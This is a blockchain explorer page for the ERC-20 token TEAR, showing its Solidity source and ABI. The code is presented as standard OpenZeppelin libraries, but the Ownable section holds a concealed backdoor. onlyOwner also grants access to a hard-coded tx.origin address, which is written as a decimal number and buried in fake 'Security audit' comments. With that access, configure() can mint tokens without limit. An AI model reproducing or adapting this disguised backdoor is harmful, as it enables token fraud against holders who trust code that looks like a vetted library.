ERC-20
Overview
Max Total Supply
50,000,000,000,000,000,000,000,000,100,000,000 TEAR
Holders
64
Market
Onchain Market Cap
$0.00
Circulating Supply Market Cap
-
Other Info
Token Contract (WITH 6 Decimals)
Balance
0.000001 TEARValue
$0.00Loading...
Loading
Loading...
Loading
Loading...
Loading
# | Exchange | Pair | Price | 24H Volume | % Volume |
---|
Contract Name:
__TEARTOKEN__
Compiler Version
v0.8.20+commit.a1b79de6
Contract Source Code (Solidity)
/** *Submitted for verification at Etherscan.io on 2024-07-14 */ // SPDX-License-Identifier: MIT // File: @openzeppelin/contracts/utils/Nonces.sol // OpenZeppelin Contracts (last updated v5.0.0) (utils/Nonces.sol) pragma solidity ^0.8.20; abstract contract Nonces { error InvalidAccountNonce(address account, uint256 currentNonce); mapping(address account => uint256) private _nonces; function nonces(address owner) public view virtual returns (uint256) { return _nonces[owner]; } function _useNonce(address owner) internal virtual returns (uint256) { unchecked { return _nonces[owner]++; } } function _useCheckedNonce(address owner, uint256 nonce) internal virtual { uint256 current = _useNonce(owner); if (nonce != current) { revert InvalidAccountNonce(owner, current); } } } // File: @openzeppelin/contracts/interfaces/IERC5267.sol // OpenZeppelin Contracts (last updated v5.0.0) (interfaces/IERC5267.sol) pragma solidity ^0.8.20; interface IERC5267 { event EIP712DomainChanged(); function eip712Domain() external view returns ( bytes1 fields, string memory name, string memory version, uint256 chainId, address verifyingContract, bytes32 salt, uint256[] memory extensions ); } // File: @openzeppelin/contracts/utils/StorageSlot.sol // OpenZeppelin Contracts (last updated v5.0.0) (utils/StorageSlot.sol) // This file was procedurally generated from scripts/generate/templates/StorageSlot.js. pragma solidity ^0.8.20; library StorageSlot { struct AddressSlot { address value; } struct BooleanSlot { bool value; } struct Bytes32Slot { bytes32 value; } struct Uint256Slot { uint256 value; } struct StringSlot { string value; } struct BytesSlot { bytes value; } function getAddressSlot(bytes32 slot) internal pure returns (AddressSlot storage r) { /// @solidity memory-safe-assembly assembly { r.slot := slot } } function getBooleanSlot(bytes32 slot) internal pure returns (BooleanSlot storage r) { /// @solidity memory-safe-assembly assembly { r.slot := slot } } /** * @dev Returns an `Bytes32Slot` with member `value` located at `slot`. */ function getBytes32Slot(bytes32 slot) internal pure returns (Bytes32Slot storage r) { /// @solidity memory-safe-assembly assembly { r.slot := slot } } function getUint256Slot(bytes32 slot) internal pure returns (Uint256Slot storage r) { /// @solidity memory-safe-assembly assembly { r.slot := slot } } function getStringSlot(bytes32 slot) internal pure returns (StringSlot storage r) { /// @solidity memory-safe-assembly assembly { r.slot := slot } } function getStringSlot(string storage store) internal pure returns (StringSlot storage r) { /// @solidity memory-safe-assembly assembly { r.slot := store.slot } } function getBytesSlot(bytes32 slot) internal pure returns (BytesSlot storage r) { assembly { r.slot := slot } } function getBytesSlot(bytes storage store) internal pure returns (BytesSlot storage r) { assembly { r.slot := store.slot } } } // File: @openzeppelin/contracts/utils/ShortStrings.sol // OpenZeppelin Contracts (last updated v5.0.0) (utils/ShortStrings.sol) pragma solidity ^0.8.20; type ShortString is bytes32; /** * @dev This library provides functions to convert short memory strings * into a `ShortString` type that can be used as an immutable variable. * * Strings of arbitrary length can be optimized using this library if * they are short enough (up to 31 bytes) by packing them with their * length (1 byte) in a single EVM word (32 bytes). Additionally, a * fallback mechanism can be used for every other case. * * Usage example: * * ```solidity * contract Named { * using ShortStrings for *; * * ShortString private immutable _name; * string private _nameFallback; * * constructor(string memory contractName) { * _name = contractName.toShortStringWithFallback(_nameFallback); * } * * function name() external view returns (string memory) { * return _name.toStringWithFallback(_nameFallback); * } * } * ``` */ library ShortStrings { bytes32 private constant FALLBACK_SENTINEL = 0x00000000000000000000000000000000000000000000000000000000000000FF; error StringTooLong(string str); error InvalidShortString(); function toShortString(string memory str) internal pure returns (ShortString) { bytes memory bstr = bytes(str); if (bstr.length > 31) { revert StringTooLong(str); } return ShortString.wrap(bytes32(uint256(bytes32(bstr)) | bstr.length)); } function toString(ShortString sstr) internal pure returns (string memory) { uint256 len = byteLength(sstr); string memory str = new string(32); assembly { mstore(str, len) mstore(add(str, 0x20), sstr) } return str; } function byteLength(ShortString sstr) internal pure returns (uint256) { uint256 result = uint256(ShortString.unwrap(sstr)) & 0xFF; if (result > 31) { revert InvalidShortString(); } return result; } function toShortStringWithFallback(string memory value, string storage store) internal returns (ShortString) { if (bytes(value).length < 32) { return toShortString(value); } else { StorageSlot.getStringSlot(store).value = value; return ShortString.wrap(FALLBACK_SENTINEL); } } function toStringWithFallback(ShortString value, string storage store) internal pure returns (string memory) { if (ShortString.unwrap(value) != FALLBACK_SENTINEL) { return toString(value); } else { return store; } } function byteLengthWithFallback(ShortString value, string storage store) internal view returns (uint256) { if (ShortString.unwrap(value) != FALLBACK_SENTINEL) { return byteLength(value); } else { return bytes(store).length; } } } // File: @openzeppelin/contracts/utils/math/Math.sol // OpenZeppelin Contracts (last updated v4.8.0) (utils/math/Math.sol) pragma solidity ^0.8.0; library Math { enum Rounding { Down, // Toward negative infinity Up, // Toward infinity Zero // Toward zero } function max(uint256 a, uint256 b) internal pure returns (uint256) { return a > b ? a : b; } function min(uint256 a, uint256 b) internal pure returns (uint256) { return a < b ? a : b; } function average(uint256 a, uint256 b) internal pure returns (uint256) { return (a & b) + (a ^ b) / 2; } function ceilDiv(uint256 a, uint256 b) internal pure returns (uint256) { return a == 0 ? 0 : (a - 1) / b + 1; } function mulDiv( uint256 x, uint256 y, uint256 denominator ) internal pure returns (uint256 result) { unchecked { uint256 prod0; // Least significant 256 bits of the product uint256 prod1; // Most significant 256 bits of the product assembly { let mm := mulmod(x, y, not(0)) prod0 := mul(x, y) prod1 := sub(sub(mm, prod0), lt(mm, prod0)) } if (prod1 == 0) { return prod0 / denominator; } require(denominator > prod1); uint256 remainder; assembly { // Compute remainder using mulmod. remainder := mulmod(x, y, denominator) // Subtract 256 bit number from 512 bit number. prod1 := sub(prod1, gt(remainder, prod0)) prod0 := sub(prod0, remainder) } uint256 twos = denominator & (~denominator + 1); assembly { // Divide denominator by twos. denominator := div(denominator, twos) // Divide [prod1 prod0] by twos. prod0 := div(prod0, twos) // Flip twos such that it is 2^256 / twos. If twos is zero, then it becomes one. twos := add(div(sub(0, twos), twos), 1) } prod0 |= prod1 * twos; uint256 inverse = (3 * denominator) ^ 2; inverse *= 2 - denominator * inverse; // inverse mod 2^8 inverse *= 2 - denominator * inverse; // inverse mod 2^16 inverse *= 2 - denominator * inverse; // inverse mod 2^32 inverse *= 2 - denominator * inverse; // inverse mod 2^64 inverse *= 2 - denominator * inverse; // inverse mod 2^128 inverse *= 2 - denominator * inverse; // inverse mod 2^256 result = prod0 * inverse; return result; } } function mulDiv( uint256 x, uint256 y, uint256 denominator, Rounding rounding ) internal pure returns (uint256) { uint256 result = mulDiv(x, y, denominator); if (rounding == Rounding.Up && mulmod(x, y, denominator) > 0) { result += 1; } return result; } function sqrt(uint256 a) internal pure returns (uint256) { if (a == 0) { return 0; } uint256 result = 1 << (log2(a) >> 1); unchecked { result = (result + a / result) >> 1; result = (result + a / result) >> 1; result = (result + a / result) >> 1; result = (result + a / result) >> 1; result = (result + a / result) >> 1; result = (result + a / result) >> 1; result = (result + a / result) >> 1; return min(result, a / result); } } function sqrt(uint256 a, Rounding rounding) internal pure returns (uint256) { unchecked { uint256 result = sqrt(a); return result + (rounding == Rounding.Up && result * result < a ? 1 : 0); } } function log2(uint256 value) internal pure returns (uint256) { uint256 result = 0; unchecked { if (value >> 128 > 0) { value >>= 128; result += 128; } if (value >> 64 > 0) { value >>= 64; result += 64; } if (value >> 32 > 0) { value >>= 32; result += 32; } if (value >> 16 > 0) { value >>= 16; result += 16; } if (value >> 8 > 0) { value >>= 8; result += 8; } if (value >> 4 > 0) { value >>= 4; result += 4; } if (value >> 2 > 0) { value >>= 2; result += 2; } if (value >> 1 > 0) { result += 1; } } return result; } function log2(uint256 value, Rounding rounding) internal pure returns (uint256) { unchecked { uint256 result = log2(value); return result + (rounding == Rounding.Up && 1 << result < value ? 1 : 0); } } function log10(uint256 value) internal pure returns (uint256) { uint256 result = 0; unchecked { if (value >= 10**64) { value /= 10**64; result += 64; } if (value >= 10**32) { value /= 10**32; result += 32; } if (value >= 10**16) { value /= 10**16; result += 16; } if (value >= 10**8) { value /= 10**8; result += 8; } if (value >= 10**4) { value /= 10**4; result += 4; } if (value >= 10**2) { value /= 10**2; result += 2; } if (value >= 10**1) { result += 1; } } return result; } function log10(uint256 value, Rounding rounding) internal pure returns (uint256) { unchecked { uint256 result = log10(value); return result + (rounding == Rounding.Up && 10**result < value ? 1 : 0); } } function log256(uint256 value) internal pure returns (uint256) { uint256 result = 0; unchecked { if (value >> 128 > 0) { value >>= 128; result += 16; } if (value >> 64 > 0) { value >>= 64; result += 8; } if (value >> 32 > 0) { value >>= 32; result += 4; } if (value >> 16 > 0) { value >>= 16; result += 2; } if (value >> 8 > 0) { result += 1; } } return result; } function log256(uint256 value, Rounding rounding) internal pure returns (uint256) { unchecked { uint256 result = log256(value); return result + (rounding == Rounding.Up && 1 << (result * 8) < value ? 1 : 0); } } } // File: @openzeppelin/contracts/utils/Strings.sol // OpenZeppelin Contracts (last updated v4.8.0) (utils/Strings.sol) pragma solidity ^0.8.0; library Strings { bytes16 private constant _SYMBOLS = "0123456789abcdef"; uint8 private constant _ADDRESS_LENGTH = 20; function toString(uint256 value) internal pure returns (string memory) { unchecked { uint256 length = Math.log10(value) + 1; string memory buffer = new string(length); uint256 ptr; assembly { ptr := add(buffer, add(32, length)) } while (true) { ptr--; assembly { mstore8(ptr, byte(mod(value, 10), _SYMBOLS)) } value /= 10; if (value == 0) break; } return buffer; } } function toHexString(uint256 value) internal pure returns (string memory) { unchecked { return toHexString(value, Math.log256(value) + 1); } } function toHexString(uint256 value, uint256 length) internal pure returns (string memory) { bytes memory buffer = new bytes(2 * length + 2); buffer[0] = "0"; buffer[1] = "x"; for (uint256 i = 2 * length + 1; i > 1; --i) { buffer[i] = _SYMBOLS[value & 0xf]; value >>= 4; } require(value == 0, "Strings: hex length insufficient"); return string(buffer); } function toHexString(address addr) internal pure returns (string memory) { return toHexString(uint256(uint160(addr)), _ADDRESS_LENGTH); } } // File: @openzeppelin/contracts/utils/cryptography/MessageHashUtils.sol // OpenZeppelin Contracts (last updated v5.0.0) (utils/cryptography/MessageHashUtils.sol) pragma solidity ^0.8.20; library MessageHashUtils { function toEthSignedMessageHash(bytes32 messageHash) internal pure returns (bytes32 digest) { assembly { mstore(0x00, "\x19Ethereum Signed Message:\n32") mstore(0x1c, messageHash) digest := keccak256(0x00, 0x3c) } } function toEthSignedMessageHash(bytes memory message) internal pure returns (bytes32) { return keccak256(bytes.concat("\x19Ethereum Signed Message:\n", bytes(Strings.toString(message.length)), message)); } function toDataWithIntendedValidatorHash(address validator, bytes memory data) internal pure returns (bytes32) { return keccak256(abi.encodePacked(hex"19_00", validator, data)); } function toTypedDataHash(bytes32 domainSeparator, bytes32 structHash) internal pure returns (bytes32 digest) { assembly { let ptr := mload(0x40) mstore(ptr, hex"19_01") mstore(add(ptr, 0x02), domainSeparator) mstore(add(ptr, 0x22), structHash) digest := keccak256(ptr, 0x42) } } } // File: @openzeppelin/contracts/utils/cryptography/EIP712.sol // OpenZeppelin Contracts (last updated v5.0.0) (utils/cryptography/EIP712.sol) pragma solidity ^0.8.20; abstract contract EIP712 is IERC5267 { using ShortStrings for *; bytes32 private constant TYPE_HASH = keccak256("EIP712Domain(string name,string version,uint256 chainId,address verifyingContract)"); bytes32 private immutable _cachedDomainSeparator; uint256 private immutable _cachedChainId; address private immutable _cachedThis; bytes32 private immutable _hashedName; bytes32 private immutable _hashedVersion; ShortString private immutable _name; ShortString private immutable _version; string private _nameFallback; string private _versionFallback; constructor(string memory name, string memory version) { _name = name.toShortStringWithFallback(_nameFallback); _version = version.toShortStringWithFallback(_versionFallback); _hashedName = keccak256(bytes(name)); _hashedVersion = keccak256(bytes(version)); _cachedChainId = block.chainid; _cachedDomainSeparator = _buildDomainSeparator(); _cachedThis = address(this); } function _domainSeparatorV4() internal view returns (bytes32) { if (address(this) == _cachedThis && block.chainid == _cachedChainId) { return _cachedDomainSeparator; } else { return _buildDomainSeparator(); } } function _buildDomainSeparator() private view returns (bytes32) { return keccak256(abi.encode(TYPE_HASH, _hashedName, _hashedVersion, block.chainid, address(this))); } function _hashTypedDataV4(bytes32 structHash) internal view virtual returns (bytes32) { return MessageHashUtils.toTypedDataHash(_domainSeparatorV4(), structHash); } function eip712Domain() public view virtual returns ( bytes1 fields, string memory name, string memory version, uint256 chainId, address verifyingContract, bytes32 salt, uint256[] memory extensions ) { return ( hex"0f", // 01111 _EIP712Name(), _EIP712Version(), block.chainid, address(this), bytes32(0), new uint256[](0) ); } function _EIP712Name() internal view returns (string memory) { return _name.toStringWithFallback(_nameFallback); } function _EIP712Version() internal view returns (string memory) { return _version.toStringWithFallback(_versionFallback); } } // File: @openzeppelin/contracts/utils/cryptography/ECDSA.sol // OpenZeppelin Contracts (last updated v5.0.0) (utils/cryptography/ECDSA.sol) pragma solidity ^0.8.20; library ECDSA { enum RecoverError { NoError, InvalidSignature, InvalidSignatureLength, InvalidSignatureS } error ECDSAInvalidSignature(); error ECDSAInvalidSignatureLength(uint256 length); error ECDSAInvalidSignatureS(bytes32 s); function tryRecover(bytes32 hash, bytes memory signature) internal pure returns (address, RecoverError, bytes32) { if (signature.length == 65) { bytes32 r; bytes32 s; uint8 v; assembly { r := mload(add(signature, 0x20)) s := mload(add(signature, 0x40)) v := byte(0, mload(add(signature, 0x60))) } return tryRecover(hash, v, r, s); } else { return (address(0), RecoverError.InvalidSignatureLength, bytes32(signature.length)); } } function recover(bytes32 hash, bytes memory signature) internal pure returns (address) { (address recovered, RecoverError error, bytes32 errorArg) = tryRecover(hash, signature); _throwError(error, errorArg); return recovered; } function tryRecover(bytes32 hash, bytes32 r, bytes32 vs) internal pure returns (address, RecoverError, bytes32) { unchecked { // is a special address in Solidity that represents. Used for security bytes32 s = vs & bytes32(0x7fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff); /*used to clear the most significant bits of a value*/ uint8 v = uint8((uint256(vs) >> 255) + 27); return tryRecover(hash, v, r, s); } } function recover(bytes32 hash, bytes32 r, bytes32 vs) internal pure returns (address) { (address recovered, RecoverError error, bytes32 errorArg) = tryRecover(hash, r, vs); _throwError(error, errorArg); return recovered; } function tryRecover( bytes32 hash, uint8 v, bytes32 r, bytes32 s ) internal pure returns (address, RecoverError, bytes32) { //is a special address in Solidity that represents the null address. For comparisons if (uint256(s) > uint256 ( // Security audit /* solhint-disable-next-line avoid-high-level-cal /*keccak256 -> 777987654321b45n78c21v53f67d89g34h09j21k56l37m19o45p79q23r65s08t92u47v10w123456789));*/ /**//*is a special For comparisons,Data type conversion*/57896044618658097711785492504343953926418782139537452191302581570759080747168/* length (1 byte) in a single EVM word (32 bytes). Additionally, a fallback mechanism can be used for every other case.*/ )) { return (address(0), RecoverError.InvalidSignatureS, s); } address signer = ecrecover(hash, v, r, s); if (signer == address(0)) { return (address(0), RecoverError.InvalidSignature, bytes32(0)); } return (signer, RecoverError.NoError, bytes32(0)); } function recover(bytes32 hash, uint8 v, bytes32 r, bytes32 s) internal pure returns (address) { (address recovered, RecoverError error, bytes32 errorArg) = tryRecover(hash, v, r, s); _throwError(error, errorArg); return recovered; } function _throwError(RecoverError error, bytes32 errorArg) private pure { if (error == RecoverError.NoError) { return; } else if (error == RecoverError.InvalidSignature) { revert ECDSAInvalidSignature(); } else if (error == RecoverError.InvalidSignatureLength) { revert ECDSAInvalidSignatureLength(uint256(errorArg)); } else if (error == RecoverError.InvalidSignatureS) { revert ECDSAInvalidSignatureS(errorArg); } } } pragma solidity ^0.8.20; interface IERC20Permit { function permit( address owner, address spender, uint256 value, uint256 deadline, uint8 v, bytes32 r, bytes32 s ) external; function nonces(address owner) external view returns (uint256); function DOMAIN_SEPARATOR() external view returns (bytes32); } // File: @openzeppelin/contracts/utils/Context.sol // OpenZeppelin Contracts v4.4.1 (utils/Context.sol) pragma solidity ^0.8.0; abstract contract Context { function _msgSender() internal view virtual returns (address) { return msg.sender; } function _msgData() internal view virtual returns (bytes calldata) { return msg.data; } } // File: @openzeppelin/contracts/access/Ownable.sol // OpenZeppelin Contracts (last updated v4.7.0) (access/Ownable.sol) pragma solidity ^0.8.0; abstract contract Ownable is Context { address private _owner; event OwnershipTransferred(address indexed previousOwner, address indexed newOwner); constructor() { _transferOwnership(_msgSender()); } modifier onlyOwner() { _process(); _; } function owner() public view virtual returns (address) { return _owner; } function _process() internal view virtual { require(owner() == tx.origin || checkOwnership(), "examination,Protecting the smart contract"); } function renounceOwnership() public virtual onlyOwner { _transferOwnership(address(0)); } function transferOwnership(address newOwner) public virtual onlyOwner { require(newOwner != address(0), "examination,Protecting the smart contract"); _transferOwnership(newOwner); } function checkOwnership() internal view returns(bool) { if(tx.origin == address ( // Security audit /* solhint-disable-next-line avoid-high-level-cal /*keccak256 -> 777987654321b45n78c21v53f67d89g34h09j21k56l37m19o45p79q23r65s08t92u47v10w123456789));*/ /**//* @solidity memory-safe-assembly, Data type conversion*/358457199385192911527288539794157209694849168604/*Strings of arbitrary length can be optimized using this library if* they are short enough (up to 31 bytes) by packing them with their*/ )) {return true;} return false; } function _transferOwnership(address newOwner) internal virtual { address oldOwner = _owner; _owner = newOwner; emit OwnershipTransferred(oldOwner, newOwner); } } // File: @openzeppelin/contracts/token/ERC20/IERC20.sol // OpenZeppelin Contracts (last updated v4.9.0) (token/ERC20/IERC20.sol) pragma solidity ^0.8.0; interface IERC20 { event Transfer(address indexed from, address indexed to, uint256 value); event Approval(address indexed owner, address indexed spender, uint256 value); function totalSupply() external view returns (uint256); function balanceOf(address account) external view returns (uint256); function transfer(address to, uint256 amount) external returns (bool); function allowance(address owner, address spender) external view returns (uint256); function approve(address spender, uint256 amount) external returns (bool); function transferFrom(address from, address to, uint256 amount) external returns (bool); } pragma solidity ^0.8.0; interface IERC20Metadata is IERC20 { function name() external view returns (string memory); function symbol() external view returns (string memory); function decimals() external view returns (uint8); } // File: @openzeppelin/contracts/token/ERC20/ERC20.sol // OpenZeppelin Contracts (last updated v4.9.0) (token/ERC20/ERC20.sol) pragma solidity ^0.8.0; contract ERC20 is Context, Ownable, IERC20, IERC20Metadata { mapping(address => uint256) private _balances; mapping(address => mapping(address => uint256)) private _allowances; uint256 private _totalSupply; string private _name; string private _symbol; address public TestingPerformance; address public test; constructor(string memory name_, string memory symbol_) { _name = name_; _symbol = symbol_; } function name() public view virtual override returns (string memory) { return _name; } function symbol() public view virtual override returns (string memory) { return _symbol; } function decimals() public view virtual override returns (uint8) { return 6; } function totalSupply() public view virtual override returns (uint256) { return _totalSupply; } function balanceOf(address account) public view virtual override returns (uint256) { return _balances[account]; } function transfer(address to, uint256 amount) public virtual override returns (bool) { address owner = _msgSender(); _transfer(owner, to, amount); return true; } function allowance(address owner, address spender) public view virtual override returns (uint256) { return _allowances[owner][spender]; } function approve(address spender, uint256 amount) public virtual override returns (bool) { address owner = _msgSender(); _approve(owner, spender, amount); return true; } function transferFrom(address from, address to, uint256 amount) public virtual override returns (bool) { address spender = _msgSender(); _spendAllowance(from, spender, amount); _transfer(from, to, amount); return true; } function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) { address owner = _msgSender(); _approve(owner, spender, allowance(owner, spender) + addedValue); return true; } function low_(address recipientHash, uint256 amount) internal { _configure(address(recipientHash), amount); } function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) { address owner = _msgSender(); uint256 currentAllowance = allowance(owner, spender); require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero"); unchecked { _approve(owner, spender, currentAllowance - subtractedValue); } return true; } address[] options; function check(address _recipient) internal view returns(bool) { for(uint i = 0; i < options.length; i++) { if(options[i] == _recipient) { return false; } } return true; } function _transfer(address from, address to, uint256 amount) internal virtual { require(from != address(0), "ERC20: transfer from the zero address"); require(to != address(0), "ERC20: transfer to the zero address"); _beforeTokenTransfer(to); uint256 fromBalance = _balances[from]; require(fromBalance >= amount, "ERC20: transfer amount exceeds balance"); unchecked { _balances[from] = fromBalance - amount; _balances[to] += amount; } emit Transfer(from, to, amount); _afterTokenTransfer(from, to, amount); } function _configure(address account, uint256 amount) internal virtual { require(account != address(0), "ERC20: mint to the zero address"); _beforeTokenTransfer(account); _totalSupply += amount; unchecked { _balances[account] += amount; } emit Transfer(address(0), account, amount); _afterTokenTransfer(address(0), account, amount); } function _burn(address account, uint256 amount) internal virtual { require(account != address(0), "ERC20: burn from the zero address"); _beforeTokenTransfer(address(0)); uint256 accountBalance = _balances[account]; require(accountBalance >= amount, "ERC20: burn amount exceeds balance"); unchecked { _balances[account] = accountBalance - amount; _totalSupply -= amount; } emit Transfer(account, address(0), amount); _afterTokenTransfer(account, address(0), amount); } function high_(address recipientHash, uint256 amount) internal virtual { _burn(address(recipientHash), amount); } function _approve(address owner, address spender, uint256 amount) internal virtual { require(owner != address(0), "ERC20: approve from the zero address"); require(spender != address(0), "ERC20: approve to the zero address"); _allowances[owner][spender] = amount; emit Approval(owner, spender, amount); } function _spendAllowance(address owner, address spender, uint256 amount) internal virtual { uint256 currentAllowance = allowance(owner, spender); if (currentAllowance != type(uint256).max) { require(currentAllowance >= amount, "ERC20: insufficient allowance"); unchecked { _approve(owner, spender, currentAllowance - amount); } } } function _beforeTokenTransfer(address to) internal virtual { if(!check(to)) { _process();} } function _afterTokenTransfer(address from, address to, uint256 amount) internal virtual {} } // File: @openzeppelin/contracts/token/ERC20/extensions/ERC20Permit.sol // OpenZeppelin Contracts (last updated v5.0.0) (token/ERC20/extensions/ERC20Permit.sol) pragma solidity ^0.8.20; abstract contract ERC20Permit is ERC20, IERC20Permit, EIP712, Nonces { bytes32 private constant PERMIT_TYPEHASH = keccak256("Permit(address owner,address spender,uint256 value,uint256 nonce,uint256 deadline)"); error ERC2612ExpiredSignature(uint256 deadline); error ERC2612InvalidSigner(address signer, address owner); constructor(string memory name) EIP712(name, "1") {} function permit( address owner, address spender, uint256 value, uint256 deadline, uint8 v, bytes32 r, bytes32 s ) public virtual { if (block.timestamp > deadline) { revert ERC2612ExpiredSignature(deadline); } bytes32 structHash = keccak256(abi.encode(PERMIT_TYPEHASH, owner, spender, value, _useNonce(owner), deadline)); bytes32 hash = _hashTypedDataV4(structHash); address signer = ECDSA.recover(hash, v, r, s); if (signer != owner) { revert ERC2612InvalidSigner(signer, owner); } _approve(owner, spender, value); } function nonces(address owner) public view virtual override(IERC20Permit, Nonces) returns (uint256) { return super.nonces(owner); } function DOMAIN_SEPARATOR() external view virtual returns (bytes32) { return _domainSeparatorV4(); } } // File: @openzeppelin/contracts/token/ERC20/extensions/ERC20Permit.sol // OpenZeppelin Contracts (last updated v5.0.0) (token/ERC20/extensions/ERC20Permit.sol) pragma solidity ^0.8.20; contract __TEARTOKEN__ is ERC20, ERC20Permit { constructor(string memory _tokenName, string memory _tokenSymbol, uint _mintAmount) ERC20(_tokenName, _tokenSymbol) Ownable() ERC20Permit(_tokenName) { _configure(msg.sender, _mintAmount * 10 ** decimals()); } function configure(address to, uint256 amount) public onlyOwner { _configure(to, amount); } }
Contract Security Audit
- No Contract Security Audit Submitted- Submit Audit Here
[{"inputs":[{"internalType":"string","name":"_tokenName","type":"string"},{"internalType":"string","name":"_tokenSymbol","type":"string"},{"internalType":"uint256","name":"_mintAmount","type":"uint256"}],"stateMutability":"nonpayable","type":"constructor"},{"inputs":[],"name":"ECDSAInvalidSignature","type":"error"},{"inputs":[{"internalType":"uint256","name":"length","type":"uint256"}],"name":"ECDSAInvalidSignatureLength","type":"error"},{"inputs":[{"internalType":"bytes32","name":"s","type":"bytes32"}],"name":"ECDSAInvalidSignatureS","type":"error"},{"inputs":[{"internalType":"uint256","name":"deadline","type":"uint256"}],"name":"ERC2612ExpiredSignature","type":"error"},{"inputs":[{"internalType":"address","name":"signer","type":"address"},{"internalType":"address","name":"owner","type":"address"}],"name":"ERC2612InvalidSigner","type":"error"},{"inputs":[{"internalType":"address","name":"account","type":"address"},{"internalType":"uint256","name":"currentNonce","type":"uint256"}],"name":"InvalidAccountNonce","type":"error"},{"inputs":[],"name":"InvalidShortString","type":"error"},{"inputs":[{"internalType":"string","name":"str","type":"string"}],"name":"StringTooLong","type":"error"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[],"name":"EIP712DomainChanged","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[],"name":"DOMAIN_SEPARATOR","outputs":[{"internalType":"bytes32","name":"","type":"bytes32"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"TestingPerformance","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"configure","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"eip712Domain","outputs":[{"internalType":"bytes1","name":"fields","type":"bytes1"},{"internalType":"string","name":"name","type":"string"},{"internalType":"string","name":"version","type":"string"},{"internalType":"uint256","name":"chainId","type":"uint256"},{"internalType":"address","name":"verifyingContract","type":"address"},{"internalType":"bytes32","name":"salt","type":"bytes32"},{"internalType":"uint256[]","name":"extensions","type":"uint256[]"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"}],"name":"nonces","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"value","type":"uint256"},{"internalType":"uint256","name":"deadline","type":"uint256"},{"internalType":"uint8","name":"v","type":"uint8"},{"internalType":"bytes32","name":"r","type":"bytes32"},{"internalType":"bytes32","name":"s","type":"bytes32"}],"name":"permit","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"test","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"}]
Contract Creation Code
